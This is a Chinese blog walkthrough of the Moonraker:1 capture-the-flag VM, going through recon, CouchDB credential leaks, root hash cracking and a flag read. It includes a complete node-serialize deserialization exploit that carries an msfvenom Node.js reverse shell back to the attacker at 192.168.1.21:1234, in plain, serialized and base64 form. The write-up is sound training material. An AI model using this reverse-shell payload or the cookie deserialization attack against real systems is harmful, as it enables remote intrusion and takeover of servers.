Moonraker:1靶机入侵

痛定思痛。 2024-04-07 10:54 184阅读 0赞

0x01 前言

攻击Moonraker系统并且找出存在最大的威胁漏洞,通过最大威胁漏洞攻击目标靶机系统并进行提权获取系统中root目录下的flag信息。

Moonraker: 1镜像下载地址:

http://drive.google.com/open?id=13b2ewq5yqre2UbkLxZ58uHtLfk-SHvmA

0x02 信息收集

1.**存活主机扫描**

  1. root@kali2018:/# arp-scan -l

78c0f0d38a12a9006f989136835f08dd.png

发现192.168.1.10是目标靶机系统

2.**端口扫描**

namp扫描目标靶机端口

  1. root@kali2018:~# nmap -p  - -A  192.168.1.10  --open
  3. Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-11 16:21 EST
  5. Nmap scan report for 192.168.1.10
  7. Host is up (0.00077s latency).
  9. Not shown: 65529 closed ports
  11. PORT      STATE SERVICE  VERSION
  13. 22/tcp    open  sshOpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
  15. | ssh-hostkey:
  17. |   2048 5f:bf:c0:33:51:4f:4a:a7:4a:7e:15:80:aa:d7:2a:0b (RSA)
  19. |   256 53:59:87:1e:a4:46:bd:a7:fd:9a:5f:f9:b7:40:9d:2f (ECDSA)
  21. |_  256 0d:88:d9:fa:af:08:ce:2b:13:66:a7:70:ec:49:02:10 (ED25519)
  23. 80/tcp    open  httpApache httpd 2.4.25 ((Debian))
  25. | http-robots.txt: 1 disallowed entry
  27. |_/
  29. |_http-server-header: Apache/2.4.25 (Debian)
  31. |_http-title: MOONRAKER
  33. 3000/tcp  open  httpNode.js Express framework
  35. | http-auth:
  37. | HTTP/1.1 401 Unauthorized\x0D
  39. |_  Basic realm=401
  41. |_http-title: Site doesn't have a title (text/html; charset=utf-8).
  43. 4369/tcp  open  epmdErlang Port Mapper Daemon
  45. | epmd-info:
  47. |   epmd_port: 4369
  49. |   nodes:
  51. |_    couchdb: 33681
  53. 5984/tcp  open  couchdb?
  55. | fingerprint-strings:
  57. |   FourOhFourRequest:
  59. |     HTTP/1.0 404 Object Not Found
  61. |     Cache-Control: must-revalidate
  63. |     Connection: close
  65. |     Content-Length: 58
  67. |     Content-Type: application/json
  69. |     Date: Mon, 11 Feb 2019 21:22:55 GMT
  71. |     Server: CouchDB/2.2.0 (Erlang OTP/19)
  73. |     X-Couch-Request-ID: bf092a958f
  75. |     X-CouchDB-Body-Time: 0
  77. |     {
  78.      "error":"not_found","reason":"Database does not exist."}
  80. |   GetRequest:
  82. |     HTTP/1.0 200 OK
  84. |     Cache-Control: must-revalidate
  86. |     Connection: close
  88. |     Content-Length: 164
  90. |     Content-Type: application/json
  92. |     Date: Mon, 11 Feb 2019 21:22:02 GMT
  94. |     Server: CouchDB/2.2.0 (Erlang OTP/19)
  96. |     X-Couch-Request-ID: f038a56575
  98. |     X-CouchDB-Body-Time: 0
  100. |{
  101.      "couchdb":"Welcome","version":"2.2.0","git_sha":"2a16ec4","features":["pluggable-storage-engines","scheduler"],"vendor":{
  102.      "name":"The Apache Software Foundation"}}
  104. |   HTTPOptions:
  106. |     HTTP/1.0 500 Internal Server Error
  108. |     Cache-Control: must-revalidate
  110. |     Connection: close
  112. |     Content-Length: 61
  114. |     Content-Type: application/json
  116. |     Date: Mon, 11 Feb 2019 21:22:02 GMT
  118. |     Server: CouchDB/2.2.0 (Erlang OTP/19)
  120. |     X-Couch-Request-ID: fdeb1a3860
  122. |     X-Couch-Stack-Hash: 1828508689
  124. |     X-CouchDB-Body-Time: 0
  126. |_{
  127.      "error":"unknown_error","reason":"badarg","ref":1828508689}

08965f3632bb49f3409382eab11c027f.png

NMAP扫描输出显示开放端口服务:22(ssh),80(http),110(pop3),3000(node.js),4369(epmd),5984(couchdb)

3.**目录扫描**

我比较喜欢gobuster和DirBuster来进行目录扫描,这里我用gobuster进行目标目录扫描。

在扫描完成后,发现一个可疑的目录为/services

15630659f2c485eef93d46b8b1b74a49.png

打开该目录的链接地址http://192.168.1.10/services/,可以在网页底部看到SEND AN INIRIRY的超级链接,然后打开超链接。

300b2a150ebb6ea4d715bd7d2a26e34d.png

打开链接后显示了一个售后联系信息页面。注意到有人会查询我们提交的信息,并会在5分钟内与我们联系。

ce8ee36ea047f7e0f2bcccfbe7011b05.png

这里我们使用标签嵌套了我的远程服务网站地址。(只要对方访问了该嵌套xss,远端服务器的日志就会被记录访问请求日志记录)

1a1395a47724a5049f89428f4a3cfd40.png

apache启动

在提交信息前,启动apache服务,并在/var/www/html目录下新建一个测试文件test.txt,内容随便写一个。

  1. root@kali2018:~# /etc/init.d/apache2 start
  3. [ ok ] Starting apache2 (via systemctl): apache2.service.
  5. root@kali2018:~# cd /var/www
  7. root@kali2018:/var/www# ls
  9. html
  11. root@kali2018:/var/www# cd html/
  13. root@kali2018:/var/www/html# ls
  15. index.html  index.nginx-debian.html
  17. root@kali2018:/var/www/html# vi  test.txt
  19. root@kali2018:/var/www/html#

测试apache服务器能正常访问

17af2b08fe65dfd6fa797361f12eb020.png

随后可以通过apache2 access.log可以查看到访问目标靶机网站日志记录。点击提交后,它已显示感谢您的提交消息,如下图所示。

5135202092d66b2882e23502910b9dc2.png

通过命令查看apache访问日志

  1. tail -f /var/log/apache2/access.log

可以发现日志中有一个有趣的http refefer地址:http://192.168.1.10/svc-inq/salesmoon-gui.php

18cab2fa96f4f0c9dddefdf050376ff6.png

0x03 漏洞利用

1.CouchDB**信息收集**

我们在浏览器中打开http refefer请求地址

96d22c68592443a7ba3ae2c9c55f02f4.png

然后显示出”返回销售管理后台”的超链接,点击可进入到销售后台管理登录页面。

6fdda7189123939aae8930441f76be5e.png

接下来我们点击CouchDB Notes并得到一些关于用户名的密码的提示:

用户名:jaws ,密码:jaws女友名字+ x99

305ec9008202043236f5854d24069fb4.png

在这里,我们谷歌搜索Jaws’ girlfriend

869839b7002ee9366bd65c86bdad64ac.png

已获取到Fauxton系统中Apache CouchDB的用户名和密码。要了解有关Fauxton和CouchDB的更多信息,我们可以通过googel搜索它们的使用方法(http://docs.couchdb.org/en/stable/fauxton/install.html).

9328428c0fff59bb480b9c08f6c77ec7.png

2.CouchDB**登录及信息泄露**

由于端口5984是开放的。可以打开CouchDB登录页面(192.168.1.10:5984/_utils/).

这里我们使用了Login Credentials,如下所示:

Username: jaws

Password: dollyx99

9554dfd32c0f83115af8b73e6a283451.png

7ee22385dd5f08e6ac7dd6dc8c761a98.png

已成功登录,现在让我们查看这3个数据库中的信息。

该links数据库暴露出更多的信息

928a6805174646ca37d2c8e246c4d86c.png

56924a7270a1fc2830dc1bc731f9fe6a.png

4e1a86eb9fabf1b11eab782947d93857.png

ae36a187e0fe6b6cde199c82db8aa4cc.png

查看该链接数据库中的文档,因为每个文档都包含目录链接,但第三个目录链接可能会为我们的下一步渗透提供有用的信息。

1adfa85b1cefa84792136d8e32f94750.png

b8a0e7257d08c511b41d2e1e1bb1f4ad.png

因此,我们打开第三个文档的连接,并查看到有用的连接目录信息。

所以上面的链接,在打开后显示出一个人事办公备忘记录的信息(这里记录几个人的重要邮件信息)

c5571fc1c7fa94e4577d5d80663c1091.png

可以看到邮件中泄露了用户名和密码

a907924afb1523ffa3455e49f963acca.png

3.Node.js**反序列化**

这里打开http://192.168.1.10/raker-sales/后台管理页面,发现“hugo's page moved to port 3k”页面是有趣的(结合上面人事备忘记录页面中的hugo邮件信息)

2d05a982dcd23beca57aef52b5de481e.png

打开该链接后,可看到有关node.js服务器和访问的信息

77097496ee0e62cfc7198539e680bfda.png

用户名和密码在Hugo的HR邮件中http://192.168.1.10/HR-Confidential/offer-letters.html

30a2f96a831c1470a36aed4d9f540e0a.png

显示出登录node.js的用户名和密码(通过3000端口访问)

7a714d0f7e9a78718e80e27666a82763.png

登录后,node.js服务器会发送“Set-Cookie”信息。

febf16dc.png

Node.js反序列化漏洞相关信息可以参考该链接地址。

4.**反序化漏洞利用**

从NMAP Scan输出,我们知道端口3000是Node.js框架应用。因此,我们在浏览器上打开目标IP的3000端口应用并弹出登录用户界面。

Username: hugo

Password: TempleLasersL2K

323b031a0c9102cbf7a2be4ca5bb0f7d.png

成功登录后,我们会在页面中显示一条消息。这个页面似乎毫无用处,但在花时间搞清楚下一步该做什么后,它变得非常有趣。

c120bec75138a39281ee4af1c90d1d97.png

启动F12查看页面的请求信息。在Cookie中看到了base64编码信息。这里我们将以base64编码形式插入node.js反序列化漏洞。

fb25b4e6a4eaec84d802c7d45a235733.png

使用msfvenom生成nodejs反弹shell

  1. msfvenom -p nodejs/shell_reverse_tcp LHOST=192.168.1.21  LPORT=1234

从终端输出msfvenom到rce.js

rce.js:

  1. var rev = {
  3. rce: function(){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? "cmd" : "/bin/sh"; var net = require("net"), cp = require("child_process"), util = require("util"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, "192.168.1.21", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === "undefined") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on("error", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }
  5. };
  7. var serialize = require('node-serialize');
  9. console.log(serialize.serialize(rev));

运行node rce.js以获取序列化字符串输出。

  1. root@kali2018:/opt# node  rce.js
  3. {
  4.      "rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }"}

接下来,将IIFE括号()添加到上一步的序列化字符串输出的末尾

  1. {
  2.      "rce":"_$$ND_FUNC$$_function (){ var require = global.require || global.process.mainModule.constructor._load; if (!require) return; var cmd = (global.process.platform.match(/^win/i)) ? \"cmd\" : \"/bin/sh\"; var net = require(\"net\"), cp = require(\"child_process\"), util = require(\"util\"), sh = cp.spawn(cmd, []); var client = this; var counter=0; function StagerRepeat(){ client.socket = net.connect(1234, \"192.168.1.21\", function() { client.socket.pipe(sh.stdin); if (typeof util.pump === \"undefined\") { sh.stdout.pipe(client.socket); sh.stderr.pipe(client.socket); } else { util.pump(sh.stdout, client.socket); util.pump(sh.stderr, client.socket); } }); socket.on(\"error\", function(error) { counter++; if(counter<= 10){ setTimeout(function() { StagerRepeat();}, 5*1000); } else process.exit(); }); } StagerRepeat(); }()"}

然后将其转换成base64编码

  1. eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7IHZhciByZXF1aXJlID0gZ2xvYmFsLnJlcXVpcmUgfHwgZ2xvYmFsLnByb2Nlc3MubWFpbk1vZHVsZS5jb25zdHJ1Y3Rvci5fbG9hZDsgaWYgKCFyZXF1aXJlKSByZXR1cm47IHZhciBjbWQgPSAoZ2xvYmFsLnByb2Nlc3MucGxhdGZvcm0ubWF0Y2goL153aW4vaSkpID8gXCJjbWRcIiA6IFwiL2Jpbi9zaFwiOyB2YXIgbmV0ID0gcmVxdWlyZShcIm5ldFwiKSwgY3AgPSByZXF1aXJlKFwiY2hpbGRfcHJvY2Vzc1wiKSwgdXRpbCA9IHJlcXVpcmUoXCJ1dGlsXCIpLCBzaCA9IGNwLnNwYXduKGNtZCwgW10pOyB2YXIgY2xpZW50ID0gdGhpczsgdmFyIGNvdW50ZXI9MDsgZnVuY3Rpb24gU3RhZ2VyUmVwZWF0KCl7IGNsaWVudC5zb2NrZXQgPSBuZXQuY29ubmVjdCgxMjM0LCBcIjE5Mi4xNjguMS4yMVwiLCBmdW5jdGlvbigpIHsgY2xpZW50LnNvY2tldC5waXBlKHNoLnN0ZGluKTsgaWYgKHR5cGVvZiB1dGlsLnB1bXAgPT09IFwidW5kZWZpbmVkXCIpIHsgc2guc3Rkb3V0LnBpcGUoY2xpZW50LnNvY2tldCk7IHNoLnN0ZGVyci5waXBlKGNsaWVudC5zb2NrZXQpOyB9IGVsc2UgeyB1dGlsLnB1bXAoc2guc3Rkb3V0LCBjbGllbnQuc29ja2V0KTsgdXRpbC5wdW1wKHNoLnN0ZGVyciwgY2xpZW50LnNvY2tldCk7IH0gfSk7IHNvY2tldC5vbihcImVycm9yXCIsIGZ1bmN0aW9uKGVycm9yKSB7IGNvdW50ZXIrKzsgaWYoY291bnRlcjw9IDEwKXsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgU3RhZ2VyUmVwZWF0KCk7fSwgNSoxMDAwKTsgfSBlbHNlIHByb2Nlc3MuZXhpdCgpOyB9KTsgfSBTdGFnZXJSZXBlYXQoKTsgfSgpIn0=

a2f04c4564fdc51b5d098b5478db55df.png

先登录node.js后台,然后再刷新页面,通过bupsuit进行拦截,将整个base64字符串设置为cookie中profile的值,替换完profile值后进行拦截提交,在者之前,您需要设置您的nc侦听。

0d52e6937a428b9ad19cb046316991c6.png

现在,我们在攻击机上监听netcat,然后通过python脚本进入交互shell界面:python-c’import pty; pty.spawn(“/bin/bash”)’

  1. root@kali2018:/opt# nc -lvvp 1234
  3. listening on [any] 1234 ...
  5. 192.168.1.10: inverse host lookup failed: Unknown host
  7. connect to [192.168.1.21] from (UNKNOWN) [192.168.1.10] 46010
  9. id
  11. uid=1001(jaws) gid=1001(jaws) groups=1001(jaws)
  13. python -c "import pty;pty.spawn('/bin/bash')"
  15. jaws@moonraker:/$

0x04 权限提升

在枚举jaws帐户期间,我注意到Postfix正在本地监听25端口。

  1. netstat  -ano

1db6e48832858d7da0aee0bae92492f7.png

我们进入目录/var/mial中发现了四个邮箱账号信息,但没有权限访问它们。

  1. jaws@moonraker:~$ cd  /var/mai
  3. jaws@moonraker:/var/mail$ ls -al
  5. total 96
  7. drwxrwsr-x  2 root          mail4096 Oct 14 10:25 .
  9. drwxr-xr-x 12 root          root  4096 Sep 20 17:38 ..
  11. -rw-------  1 hugo          mail2994 Oct  6 11:47 hugo
  13. -rw-------  1 moonrakertech mail  1478 Oct5 19:24 moonrakertech
  15. -rw-------  1 root          mail 68975 Oct  6 11:40 root
  17. -rw-------  1 sales         mail6342 Oct 14 10:25 sales

在了解了CouchDb的配置之后,我们发现CouchDb的默认安装目录是/opt/couchdb,从/etc/local.ini读取配置文件。

让我们查看local.ini中的配置内容

  1. jaws@moonraker:/var/mail$tail /opt/couchdb/etc/local.ini
  5. Username: hugo
  7. Password: 321Blast0ff!!
  9. eyJyY2UiOiJfJCRORF9GVU5DJCRfZnVuY3Rpb24gKCl7ZXZhbChTdHJpbmcuZnJvbUNoYXJDb2RlKDEwLDExOCw5NywxMTQsMzIsMTEwLDEwMSwxMTYsMzIsNjEsMzIsMTE0LDEwMSwxMTMsMTE3LDEwNSwxMTQsMTAxLDQwLDM5LDExMCwxMDEsMTE2LDM5LDQxLDU5LDEwLDExOCw5NywxMTQsMzIsMTE1LDExMiw5NywxMTksMTEwLDMyLDYxLDMyLDExNCwxMDEsMTEzLDExNywxMDUsMTE0LDEwMSw0MCwzOSw5OSwxMDQsMTA1LDEwOCwxMDAsOTUsMTEyLDExNCwxMTEsOTksMTAxLDExNSwxMTUsMzksNDEsNDYsMTE1LDExMiw5NywxMTksMTEwLDU5LDEwLDcyLDc5LDgzLDg0LDYxLDM0LDQ5LDUwLDU1LDQ2LDQ4LDQ2LDQ4LDQ2LDQ5LDM0LDU5LDEwLDgwLDc5LDgyLDg0LDYxLDM0LDUwLDUxLDUxLDUxLDM0LDU5LDEwLDg0LDczLDc3LDY5LDc5LDg1LDg0LDYxLDM0LDUzLDQ4LDQ4LDQ4LDM0LDU5LDEwLDEwNSwxMDIsMzIsNDAsMTE2LDEyMSwxMTIsMTAxLDExMSwxMDIsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSw2MSw2MSwzMiwzOSwxMTcsMTEwLDEwMCwxMDEsMTAyLDEwNSwxMTAsMTAxLDEwMCwzOSw0MSwzMiwxMjMsMzIsODMsMTE2LDExNCwxMDUsMTEwLDEwMyw0NiwxMTIsMTE0LDExMSwxMTYsMTExLDExNiwxMjEsMTEyLDEwMSw0Niw5OSwxMTEsMTEwLDExNiw5NywxMDUsMTEwLDExNSwzMiw2MSwzMiwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsNDAsMTA1LDExNiw0MSwzMiwxMjMsMzIsMTE0LDEwMSwxMTYsMTE3LDExNCwxMTAsMzIsMTE2LDEwNCwxMDUsMTE1LDQ2LDEwNSwxMTAsMTAwLDEwMSwxMjAsNzksMTAyLDQwLDEwNSwxMTYsNDEsMzIsMzMsNjEsMzIsNDUsNDksNTksMzIsMTI1LDU5LDMyLDEyNSwxMCwxMDIsMTE3LDExMCw5OSwxMTYsMTA1LDExMSwxMTAsMzIsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDExOCw5NywxMTQsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiwzMiw2MSwzMiwxMTAsMTAxLDExOSwzMiwxMTAsMTAxLDExNiw0Niw4MywxMTEsOTksMTA3LDEwMSwxMTYsNDAsNDEsNTksMTAsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0Niw5OSwxMTEsMTEwLDExMCwxMDEsOTksMTE2LDQwLDgwLDc5LDgyLDg0LDQ0LDMyLDcyLDc5LDgzLDg0LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw0MSwzMiwxMjMsMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE4LDk3LDExNCwzMiwxMTUsMTA0LDMyLDYxLDMyLDExNSwxMTIsOTcsMTE5LDExMCw0MCwzOSw0Nyw5OCwxMDUsMTEwLDQ3LDExNSwxMDQsMzksNDQsOTEsOTMsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTksMTE0LDEwNSwxMTYsMTAxLDQwLDM0LDY3LDExMSwxMTAsMTEwLDEwMSw5OSwxMTYsMTAxLDEwMCwzMyw5MiwxMTAsMzQsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0NiwxMTIsMTA1LDExMiwxMDEsNDAsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDUsMTEwLDQxLDU5LDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDQsNDYsMTE1LDExNiwxMDAsMTExLDExNywxMTYsNDYsMTEyLDEwNSwxMTIsMTAxLDQwLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDEsNTksMTAsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMzIsMTE1LDEwNCw0NiwxMTUsMTE2LDEwMCwxMDEsMTE0LDExNCw0NiwxMTIsMTA1LDExMiwxMDEsNDAsOTksMTA4LDEwNSwxMDEsMTEwLDExNiw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMTUsMTA0LDQ2LDExMSwxMTAsNDAsMzksMTAxLDEyMCwxMDUsMTE2LDM5LDQ0LDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCw5OSwxMTEsMTAwLDEwMSw0NCwxMTUsMTA1LDEwMywxMTAsOTcsMTA4LDQxLDEyMywxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiw5OSwxMDgsMTA1LDEwMSwxMTAsMTE2LDQ2LDEwMSwxMTAsMTAwLDQwLDM0LDY4LDEwNSwxMTUsOTksMTExLDExMCwxMTAsMTAxLDk5LDExNiwxMDEsMTAwLDMzLDkyLDExMCwzNCw0MSw1OSwxMCwzMiwzMiwzMiwzMiwzMiwzMiwzMiwzMiwxMjUsNDEsNTksMTAsMzIsMzIsMzIsMzIsMTI1LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDk5LDEwOCwxMDUsMTAxLDExMCwxMTYsNDYsMTExLDExMCw0MCwzOSwxMDEsMTE0LDExNCwxMTEsMTE0LDM5LDQ0LDMyLDEwMiwxMTcsMTEwLDk5LDExNiwxMDUsMTExLDExMCw0MCwxMDEsNDEsMzIsMTIzLDEwLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDMyLDExNSwxMDEsMTE2LDg0LDEwNSwxMDksMTAxLDExMSwxMTcsMTE2LDQwLDk5LDQwLDcyLDc5LDgzLDg0LDQ0LDgwLDc5LDgyLDg0LDQxLDQ0LDMyLDg0LDczLDc3LDY5LDc5LDg1LDg0LDQxLDU5LDEwLDMyLDMyLDMyLDMyLDEyNSw0MSw1OSwxMCwxMjUsMTAsOTksNDAsNzIsNzksODMsODQsNDQsODAsNzksODIsODQsNDEsNTksMTApKX0oKSJ9Cg==

8a661325288fd235f8507a688c9124bf.png

有了hugo密码,我登录他的帐户并阅读他的邮件。

  1. jaws@moonraker:/var/mail$ su  hugo
  3. Password: 321Blast0ff!
  5. Mail version 8.1.2 01/15/2001.  Type ? for help.

登录hugo用户后,然后读取了其邮件信息,我们注意到Message 2很有趣,因为它包含root和哈希密码,并且还告诉我们该密码也在VROOM系统中使用。

  1. jaws@moonraker:/var/mail$ mail
  3. "/var/mail/hugo": 3 messages 3 new
  5. >N  1 moonrakertech@moo  Fri Oct5 19:11   17/842   RE:Root Access
  7.  N2 moonrakertech@moo  Fri Oct  5 19:3923/1351  RE:RE:RE:Root Access
  9.  N3 hr@moonraker.loca  Fri Oct  5 20:2417/801   Decompression Accident
  11. &

e50090ceb1a0352e1f86faf13e45def3.png

这里我们读取邮件2的信息

  1. >N  1 moonrakertech@moo  Fri Oct5 19:11   17/842   RE:Root Access
  3.  N2 moonrakertech@moo  Fri Oct  5 19:3923/1351  RE:RE:RE:Root Access
  5.  N3 hr@moonraker.loca  Fri Oct  5 20:2417/801   Decompression Accident
  7. & 2
  9. Message 2:
  11. From moonrakertech@moonraker.localdomainFri Oct  5 19:39:51 2018
  13. X-Original-To: hugo@moonraker.localdomain
  15. To: hugo@moonraker.localdomain
  17. Subject: RE:RE:RE:Root Access
  19. MIME-Version: 1.0
  21. Content-Type: text/plain; charset="UTF-8"
  23. Content-Transfer-Encoding: 8bit
  25. Date: Fri,  5 Oct 2018 19:39:51 -0400 (EDT)
  27. From: moonrakertech@moonraker.localdomain
  29. Hugo...I'm being given a reward huh? Finally some well deserved recognition! Also this better come with a bump in pay otherwise I'm not afraid to give you a piece of my mind! See you outside of the Decompression Chamber shortly as per your request...I'm expecting the Award to be in hand as I don't like to get up from me desk.
  31. Also your ticket has been complete. Since I'm feeling nice today, I'm including the password here in its native hash and not in the ticket. BTW this is the old password hash, the new one is the same + "VR00M" without quotes.
  33. Have fun with the decryption process "Boss"! Haha!
  37. root:$6$auLf9y8f$qgi63MGYQGnnk6.6ktcZIMpROPMqMXMEM7JufH1aTIApIPIZZu7yRjfIcZ1pELNoeMM7sIwCrVmMCjNYJRRGf/:17809:0:99999:7:::

这里显示了root以及对应旧密码的hash值

让我们复制旧密码哈希并通过John the Ripper进行离线破解

  1. john  root.hash

e4c2e7502b3032425db396d6a7b01d8e.png

Username: root

Password: cyber

最终新的登录密码为:cyber+VR00M(cyberVR00M)

使用root身份登录系统。

  1. su root
  3. Password: cyberVR00M
  5. hugo@moonraker:/var/mail$ su root
  7. Password: cyberVR00M

4808a9e6dda2c34063565649df10accb.png

0X05 flag**信息查看**

成功以root身份登录,在检查其邮件目录时,我们找到了flag.txt文件。

  1. root@moonraker:~# cd /root
  3. root@moonraker:~# ls
  5. coreDesktop  Downloads  flag.txt
  7. root@moonraker:~# cat flag.txt

3d059e8e.png

发表评论

表情:
评论列表 (有 0 条评论,184人围观)

还没有评论,来说两句吧...

相关阅读

    相关 Raven: 2靶机入侵

    0x00 前言 Raven 2是一个中等难度的boot2root 虚拟靶机。有四个flag需要找出。在多次被攻破后,Raven Security采取了额外措施来增强他们的

    野性酷女野性酷女/ 0/ 220 阅读